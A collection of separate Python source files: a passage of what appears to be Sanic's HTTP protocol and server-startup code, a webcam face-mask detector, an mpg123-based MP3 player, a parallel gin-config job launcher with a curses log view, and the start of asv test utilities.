def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=CIMultiDict(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
        Helper method that logs the response when
        :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
self.transport.get_extra_info("peername"),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
        :return: boolean - True if closed, False if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
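# Illustrative sketch (not part of the original source): trigger_events runs
# plain callables immediately and drives awaitables to completion on the given
# loop. The listener names below are hypothetical.
def _example_trigger_events():
    import asyncio
    def sync_listener(loop):
        print("sync listener ran")
    async def async_listener(loop):
        print("async listener ran")
    loop = asyncio.new_event_loop()
    try:
        trigger_events([sync_listener, async_listener], loop)
    finally:
        loop.close()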
def serve(
host,
port,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
    :param graceful_shutdown_timeout: How long to wait before force-closing
                                      non-idle connections
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
        _signals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
        for _signal in _signals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
        # Graceful shutdown timeout:
        # honor graceful_shutdown_timeout instead of letting
        # connections hang forever; roughly track the elapsed time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
processes = []
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
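# Hedged usage sketch (not part of the original source): serve_multiple takes
# the same keyword arguments that serve() accepts, plus a worker count. The
# `app` object and its attributes below are hypothetical placeholders for a
# Sanic application.
def _example_serve_multiple(app, workers=2):
    server_settings = {
        "host": "0.0.0.0",
        "port": 8000,
        "request_handler": app.handle_request,  # assumed app attribute
        "error_handler": app.error_handler,     # assumed app attribute
        "debug": False,
    }
    serve_multiple(server_settings, workers)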
|
mask_detect_live_cam.py
|
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import cv2
import time
from threading import Thread
import importlib.util
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
# Define the video stream
class VideoStream:
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
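# Minimal usage sketch (not part of the original script): start the threaded
# capture above, show frames until 'q' is pressed, then release the camera.
def _example_videostream_preview(max_frames=300):
    vs = VideoStream(resolution=(640, 480), framerate=30).start()
    time.sleep(1)  # let the capture thread grab its first frames
    for _ in range(max_frames):
        frame = vs.read()
        cv2.imshow('preview', frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    vs.stop()
    cv2.destroyAllWindows()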
cap = cv2.VideoCapture(0) # Change only if you have more than one webcam
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'research/ssdlite_saved_model-150k/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = 'research/training/labelmap.pbtxt'
# Number of classes to detect
NUM_CLASSES = 3
min_conf_threshold = float(0.95)
resW, resH = 1280, 720
imW, imH = int(resW), int(resH)
color_box = [(0,255,0), (0,0,255), (0,255,255)]
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Loading label map
# Label maps map indices to category names, so that when our convolutional network predicts `5`,
# we know that this corresponds to `airplane`. Here we use internal utility functions, but anything
# that returns a dictionary mapping integers to appropriate string labels would be fine.
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
print(category_index)
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# Detection
with detection_graph.as_default():
with tf.compat.v1.Session(graph=detection_graph) as sess:
while True:
# Read frame from camera
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (imW, imH))
image_np_expanded = np.expand_dims(frame_resized, axis=0)
# Extract image tensor
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Extract detection boxes
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Extract detection scores
scores = detection_graph.get_tensor_by_name('detection_scores:0')
# Extract detection classes
classes = detection_graph.get_tensor_by_name('detection_classes:0')
            # Extract number of detections
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
boxes = np.squeeze(boxes)
classes = np.squeeze(classes).astype(np.int32)
scores = np.squeeze(scores)
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cl = int(classes[i])
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), color_box[cl-1], 2)
# Draw label
object_name = category_index[classes[i]]['name']
#labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100))
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
# Display output
cv2.imshow('Object detector - frozen_inference_graph.pb', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
|
mp3player.py
|
#!/usr/bin/env python
import ctypes
from enum import Enum
import threading
import queue
from queue import Empty
import mpg123
import logging
import random
from ctypes.util import find_library
logger = logging.getLogger(__name__)
class mpg123_frameinfo(ctypes.Structure):
_fields_ = [
('version', ctypes.c_ubyte),
('layer', ctypes.c_int),
('rate', ctypes.c_long),
('mode', ctypes.c_ubyte),
('mode_ext', ctypes.c_int),
('framesize', ctypes.c_int),
('flags', ctypes.c_ubyte),
('emphasis', ctypes.c_int),
('bitrate', ctypes.c_int),
('abr_rate', ctypes.c_int),
('vbr', ctypes.c_ubyte)
]
class ExtMpg123(mpg123.Mpg123):
SEEK_SET = 0
SEEK_CURRENT = 1
SEEK_END = 2
def __init__(self, filename=None, library_path=None):
if not library_path:
library_path = find_library('mpg123')
if not library_path:
library_path = find_library('libmpg123-0')
if not library_path:
raise self.LibInitializationException('libmpg123 not found.')
super().__init__(filename, library_path)
def open(self, filename):
errcode = self._lib.mpg123_open(self.handle, filename.encode())
if errcode != mpg123.OK:
raise self.OpenFileException(self.plain_strerror(errcode))
def timeframe(self, tsec):
t = ctypes.c_double(tsec)
errcode = self._lib.mpg123_timeframe(self.handle, t)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def seek_frame(self, pos, whence=SEEK_SET):
px = ctypes.c_long(pos)
errcode = self._lib.mpg123_seek_frame(self.handle, px, whence)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def tellframe(self):
errcode = self._lib.mpg123_tellframe(self.handle)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def info(self):
px = mpg123_frameinfo()
errcode = self._lib.mpg123_info(self.handle, ctypes.pointer(px))
if errcode != mpg123.OK:
raise self.ID3Exception(self.plain_strerror(errcode))
return px
_samples_per_frame = [
# version 1, layers 1,2,3
[384, 1152, 1152],
# version 2, layers 1,2,3
[384, 1152, 576],
# version 2.5, layers 1,2,3
[384, 1152, 576]
]
def frame_seconds(self, frame):
info = self.info()
return ExtMpg123._samples_per_frame[info.version][info.layer - 1] * frame / info.rate
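# Illustrative sketch (not part of the original module): round-tripping between
# seconds and MPEG frame indices with the extended bindings above. The file
# name is a hypothetical placeholder.
def _example_frame_math(path="example.mp3"):
    mp3 = ExtMpg123()
    mp3.open(path)
    frame = mp3.timeframe(30.0)    # frame index closest to the 30 second mark
    mp3.seek_frame(frame)
    print(mp3.frame_seconds(mp3.tellframe()))  # approximately 30.0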
class ExtOut123(mpg123.Out123):
def __init__(self, library_path=None):
super().__init__(library_path)
def pause(self):
self._lib.out123_pause(self.handle)
def resume(self):
self._lib.out123_continue(self.handle)
def stop(self):
self._lib.out123_stop(self.handle)
class PlayerState(Enum):
UNINITALISED = 0
INITALISED = 1, # Drivers loaded
LOADED = 2, # MP3 loaded of x seconds
READY = 3, # Ready to play a time x
PLAYING = 4, # Playing a file at time x
PAUSED = 5, # Paused at time x
FINISHED = 6, # Finished
PLAYLIST = 7 #Playing a playlist
class Player:
class Command(Enum):
LOAD = 1,
PLAY = 2,
PAUSE = 3,
PLAYLIST = 4,
SEEK = 5
class IllegalStateException(Exception):
pass
def __init__(self):
self.mp3 = ExtMpg123()
self.out = ExtOut123()
self.command_queue = queue.Queue(maxsize=1)
self.event_queue = queue.Queue()
self.playlist_queue = queue.Queue()
self._current_state = PlayerState.INITALISED
self.event_queue.put((self._current_state, None))
threading.Thread(target=self._run_player, daemon=True, name="Player").start()
def _run_player(self):
while True:
command = self.command_queue.get(block=True, timeout=None)
if command[0] == Player.Command.LOAD:
if self._current_state in [PlayerState.PLAYING]:
self.out.pause()
self.mp3.open(command[1])
tf = self.mp3.frame_length()
self.track_length = self.mp3.frame_seconds(tf)
self.frames_per_second = tf // self.track_length
self.update_per_frame_count = round(self.frames_per_second / 5)
self.to_time = self.track_length
self._set_state(PlayerState.LOADED, self.track_length)
self._set_state(PlayerState.READY, 0)
elif command[0] == Player.Command.PLAY:
if command[1] is not None:
tf = self.mp3.timeframe(command[1])
self.mp3.seek_frame(tf)
self.to_time = self.track_length if command[2] is None else command[2]
if self._current_state in [PlayerState.READY, PlayerState.PLAYING]:
self._play()
elif self._current_state in [PlayerState.PAUSED]:
self.out.resume()
self._play()
elif command[0] == Player.Command.PAUSE:
self.out.pause()
current_frame = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(current_frame)
self._set_state(PlayerState.PAUSED, current_time)
elif command[0] == Player.Command.SEEK:
if self._current_state in \
[PlayerState.READY, PlayerState.PLAYING, PlayerState.PAUSED, PlayerState.FINISHED]:
tf = self.mp3.timeframe(command[1])
self.mp3.seek_frame(tf)
if self._current_state == PlayerState.FINISHED:
self._set_state(PlayerState.PAUSED, command[1])
else:
self.event_queue.put((self._current_state, command[1]))
if self._current_state in [PlayerState.PLAYING]:
self._play()
elif command[0] == Player.Command.PLAYLIST:
if self._current_state in [PlayerState.PLAYING]:
self.out.pause()
for song in command[1]:
self.playlist_queue.put(song)
self._set_state(PlayerState.PLAYLIST)
self._play_playlist()
else:
# what happened?
pass
def _play_playlist(self):
while True:
try:
song_mp3 = self.playlist_queue.get(block=False)
self.mp3.open(song_mp3)
tf = self.mp3.frame_length()
self.track_length = self.mp3.frame_seconds(tf)
self.frames_per_second = tf // self.track_length
self.update_per_frame_count = round(self.frames_per_second / 5)
self.to_time = self.track_length
fc = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(fc)
self._set_state(PlayerState.PLAYING, current_time)
to_frame = self.mp3.timeframe(self.to_time) + 1
for frame in self.mp3.iter_frames(self.out.start):
self.out.play(frame)
fc += 1
if fc > to_frame:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self._set_state(PlayerState.PAUSED, current_time)
return
if fc % self.update_per_frame_count == 0:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self.event_queue.put((PlayerState.PLAYING, current_time))
if not self.command_queue.empty():
return
except Empty:
break
self._set_state(PlayerState.FINISHED)
def _play(self):
fc = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(fc)
self._set_state(PlayerState.PLAYING, current_time)
to_frame = self.mp3.timeframe(self.to_time) + 1
for frame in self.mp3.iter_frames(self.out.start):
self.out.play(frame)
fc += 1
if fc > to_frame:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self._set_state(PlayerState.PAUSED, current_time)
return
if fc % self.update_per_frame_count == 0:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self.event_queue.put((PlayerState.PLAYING, current_time))
if not self.command_queue.empty():
return
self._set_state(PlayerState.FINISHED)
def _set_state(self, state, param=None):
self._current_state = state
self.event_queue.put((state, param))
def open(self, filename):
self.command_queue.put((Player.Command.LOAD, filename))
def pause(self):
self.command_queue.put((Player.Command.PAUSE, None))
def play(self, from_time=None, to_time=None):
self.command_queue.put((Player.Command.PLAY, from_time, to_time))
def seek(self, tsec):
self.command_queue.put((Player.Command.SEEK, tsec))
def playlist(self, filename_list):
self.command_queue.put((Player.Command.PLAYLIST, filename_list))
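# Illustrative sketch (not part of the original module): issue commands to the
# background player thread and consume its state events. The file name is a
# hypothetical placeholder.
def _example_play_one_track(path="example.mp3"):
    player = Player()
    player.open(path)
    player.play()
    while True:
        state, param = player.event_queue.get()
        print(state, param)
        if state in (PlayerState.FINISHED, PlayerState.PAUSED):
            break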
|
local_parallel.py
|
import curses
import subprocess
import threading
import itertools
from gin.config_parser import ConfigParser, BindingStatement
class GinParser:
def __init__(self, file):
self.parser = ConfigParser(file, None)
lines = [line for line in self.parser]
self.combinations = [self.get_combination_len(line) for line in lines]
self.lines = [line if combs > 1 else line.location.line_content.strip() for line, combs in
zip(lines, self.combinations)]
def __iter__(self):
self._iter = itertools.product(*[range(x) for x in self.combinations])
return self
def __next__(self):
ret = []
for line, i in zip(self.lines, next(self._iter)):
if isinstance(line, BindingStatement):
ret.append('/'.join(
x for x in (line.scope, '.'.join(y for y in (line.selector, line.arg_name) if y != '')) if
x != '') + '=' + str(line.value[i]))
else:
ret.append(line)
return '\n'.join(ret)
@staticmethod
def get_combination_len(line):
if isinstance(line, BindingStatement) and isinstance(line.value,
list) and not line.location.line_content.strip().endswith(
"skip"):
return len(line.value)
return 1
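# Hedged example (not part of the original file): GinParser expands every
# list-valued binding into the Cartesian product of configurations, so the two
# two-element lists below produce four gin config strings.
def _example_gin_parser():
    import io
    gin_text = "train.lr = [0.1, 0.01]\ntrain.batch_size = [32, 64]\n"
    for config_str in GinParser(io.StringIO(gin_text)):
        print(config_str)
        print('---')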
def gin_config_from_dict(params: dict):
return '\n'.join(str(x) + "=" + str(y) for x, y in params.items())
def create_local_job(py_file, gin_params) -> subprocess.Popen:
return subprocess.Popen(['/home/p/miniconda3/envs/workspace/bin/python', py_file], env={
"GIN_CONFIG": gin_config_from_dict(gin_params) if isinstance(gin_params, dict) else str(gin_params)},
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def parse_and_run(py_file, gin_file):
with open(gin_file) as f:
processes = [create_local_job(py_file, conf) for i, conf in enumerate(GinParser(f))]
latest_logs = ["" for _ in processes]
def stream_pod_logs(logs_list: [str], index: int):
for line in iter(processes[index].stdout.readline, ''):
logs_list[index] = line
threads = [threading.Thread(target=stream_pod_logs, args=(latest_logs, i), daemon=True) for
i, pod in enumerate(processes)]
    for t in threads:
        t.start()
def print_logs_in_curses(stdscr):
        stdscr.nodelay(1)  # make getch() non-blocking
inp = -1
while any(t.is_alive() for t in threads):
stdscr.erase()
if inp == -1:
stdscr.addstr(0, 0, "Press e to exit")
elif inp == ord('e'):
break
else:
stdscr.addstr(0, 0, "unknown command")
for i, log in enumerate(latest_logs):
stdscr.addstr(i + 1, 0,
log) # carriage returns mess up the output
# f'proc{i}' + ' | ' + log[log.rfind("\r") + 1:]) # carriage returns mess up the output
stdscr.refresh()
inp = stdscr.getch()
curses.wrapper(print_logs_in_curses)
if __name__ == '__main__':
parse_and_run('train.py', 'test.gin')
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
import shutil
import subprocess
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
import asv
from asv import util
from asv import commands
from asv import config
from asv import runner
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
from asv.plugins.conda import _find_conda
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
DUMMY1_VERSION = "0.14"
DUMMY2_VERSIONS = ["0.3.7", "0.3.9"]
WIN = (os.name == "nt")
try:
util.which('pypy')
HAS_PYPY = True
except (RuntimeError, IOError):
HAS_PYPY = hasattr(sys, 'pypy_version_info') and (sys.version_info[:2] == (2, 7))
try:
# Conda can install required Python versions on demand
_find_conda()
HAS_CONDA = True
except (RuntimeError, IOError):
HAS_CONDA = False
try:
import virtualenv
HAS_VIRTUALENV = True
except ImportError:
HAS_VIRTUALENV = False
try:
util.which('python{}'.format(PYTHON_VER2))
HAS_PYTHON_VER2 = True
except (RuntimeError, IOError):
HAS_PYTHON_VER2 = False
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
